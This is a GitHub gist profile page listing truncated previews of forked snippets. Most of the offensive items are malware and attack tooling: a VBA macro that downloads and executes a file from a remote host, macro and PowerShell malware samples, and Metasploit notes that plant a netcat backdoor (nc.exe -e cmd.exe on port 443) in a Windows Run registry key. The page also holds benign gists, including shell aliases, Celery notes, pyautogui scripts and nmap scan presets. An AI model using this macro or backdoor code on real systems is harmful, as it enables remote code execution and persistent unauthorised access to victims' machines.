Skip to content

Instantly share code, notes, and snippets.

View robpotter89's full-sized avatar

Robert Potter robpotter89

4 followers · 2 following
View GitHub Profile
@robpotter89
robpotter89 / classicTwist.txt
Created July 16, 2021 21:25 — forked from JPMonglis/classicTwist.txt
The classic download and execute macro, with a twist
Sub DownloadAndExec()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://trusted.domain/encoded.crt", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
@robpotter89
robpotter89 / macromal.txt
Created July 16, 2021 21:25 — forked from JPMonglis/macromal.txt
Macro malware that retrieves the OS (Windows or OSX) and executes the appropriate payload
'get OS, if nt else if OS X
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
' A Base64 Encoder/Decoder.
'
' This module is used to encode and decode data in Base64 format as described in RFC 1521.
'
' Home page: www.source-code.biz.
' License: GNU/LGPL (www.gnu.org/licenses/lgpl.html).
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland.
@robpotter89
robpotter89 / powermal.txt
Created July 16, 2021 21:25 — forked from JPMonglis/powermal.txt
PowerShell malware [posted by @JohnLaTwC]
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
@robpotter89
robpotter89 / msf_wiki.txt
Created July 16, 2021 20:20 — forked from JPMonglis/msf_wiki.txt
## msf netcat backdoor in persistance
- netcat is uncluded in metasploit
-
- upload /usr/share/windwos-binaries/nc.exe C:\\windows\\system32 ## must have system rights
-
-
- ## registry key adding
- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc
@robpotter89
robpotter89 / aliases
Created July 16, 2021 15:39 — forked from robpot891/aliases
alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias .....="cd ../../../.."
alias ~="cd ~" # `cd` is probably faster to type though
alias -- -="cd -"alias cd..="cd .."
alias dl="cd ~/Downloads"
alias h="history"
alias pubip="dig +short myip.opendns.com @resolver1.opendns.com"
alias localip="sudo ifconfig | grep -Eo 'inet (addr:)?([0-9]*\\.){3}[0-9]*' | grep -Eo '([0-9]*\\.){3}[0-9]*' | grep -v '127.0.0.1'"
@robpotter89
robpotter89 / fud3
Last active July 15, 2021 16:32 — forked from robpot891/fud3
fud3
#!/bin/bash
clear
echo ' __________ _____________ ______ _________ '
echo ' ___ ____/_____ _________ /___ __ \_____ _____ ____ /___________ ______ / '
echo ' __ /_ _ __ `/_ ___/ __/_ /_/ / __ `/_ / / /_ /_ __ \ __ `/ __ / '
echo ' _ __/ / /_/ /_(__ )/ /_ _ ____// /_/ /_ /_/ /_ / / /_/ / /_/ // /_/ / '
echo ' /_/ \__,_/ /____/ \__/ /_/ \__,_/ _\__, / /_/ \____/\__,_/ \__,_/ '
echo ' /____/ '
echo ' _________ _____ '
echo ' __ ____/_____________________________ __ /______________ '
@robpotter89
robpotter89 / Celery.md
Created November 11, 2020 16:39 — forked from JeOam/Celery.md
Celery Tips

#####What is Celery?
Celery is an asynchronous task queue. You can use it to execute tasks outside of the context of your application. The general idea is that any resource consuming tasks that your application may need to run can be offloaded to the task queue, leaving your application free to respond to client requests.

Celery has three core components:

  • The Celery client. This is used to issue background jobs.
  • The Celery workers. These are the processes that run the background jobs. Celery supports local and remote workers, so you can start with a single worker running on the same machine as your application server, and later add more workers as the needs of your application grow.
  • The message broker. The client communicates with the the workers through a message queue, and Celery supports several ways to implement these queues. The most commonly used brokers are RabbitMQ and Redis.
@robpotter89
robpotter89 / desktop_activity.py
Last active October 26, 2020 20:22
Various pyautogui scripts for mouse/keyboard automation
#!/usr/bin/env python
import sys
import pyautogui
from datetime import datetime, timedelta
def move_rel(dx, dy, dur):
pyautogui.moveRel(dx, dy, dur, pyautogui.easeInQuad)
def square(side, dur):
@robpotter89
robpotter89 / bas_sd_scraper.py
Created October 26, 2020 20:14 — forked from AO8/bas_sd_scraper.py
Python webscraper + email report creator. Uses BeautifulSoup and pyautogui to scrape Green River's online class finder for BAS software development and programming prereq enrollments, then sends email report to stakeholders.
# Python Standard Library
import smtplib
import ssl
import webbrowser
from datetime import datetime as dt
from email.mime.text import MIMEText
from time import sleep
from urllib.request import urlopen
# Third-party
@robpotter89
robpotter89 / nmap_profile.py
Created October 16, 2020 07:31 — forked from angeloped/nmap_profile.py
A collection of Nmap scan presets for python-nmap.
import re
import nmap
"""
name: nmap_profile.py
author: bryan angelo
description: A collection of Nmap scan profiles for python-nmap.
"""
nmap_profiles = {